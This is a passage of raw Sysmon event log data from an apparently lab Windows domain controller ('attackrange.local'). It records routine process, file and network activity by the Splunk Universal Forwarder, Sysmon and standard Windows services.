Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.130{266CAFBE-64F3-6064-0201-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe" --schemeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=9916D1AB54ACD0592052F87DFDBFD5F8,SHA256=704C0DEC2F15B4ADBC3165475D0F6504C90AD8B28B6926F7EAD67C2F2CCE77F5,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.833{266CAFBE-64F5-6064-0301-00000000AE01}6500NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\local\streamfwdlog.tmpMD5=51F5401F1865F9A40E1A961C7C0C9E0C,SHA256=CEAE70BB5A023E9C78590CFCBDDDC8D9FDBE4C74E061E5C4F439182BC2F01E53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.833{266CAFBE-64F5-6064-0301-00000000AE01}6500NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\local\streamfwdlog.confMD5=51F5401F1865F9A40E1A961C7C0C9E0C,SHA256=CEAE70BB5A023E9C78590CFCBDDDC8D9FDBE4C74E061E5C4F439182BC2F01E53,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.818{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=9916D1AB54ACD0592052F87DFDBFD5F8,SHA256=704C0DEC2F15B4ADBC3165475D0F6504C90AD8B28B6926F7EAD67C2F2CCE77F5,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.659{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64F6-6064-0601-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F6-6064-0601-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F6-6064-0601-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F6-6064-0601-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.488{266CAFBE-64F6-6064-0601-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000008537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.419{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53599-false10.0.1.12-9997- 354300x80000000000000008536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:00.550{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53598-false23.37.43.27a23-37-43-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000008535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:00.545{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58533- 10341000x80000000000000008534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.519{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 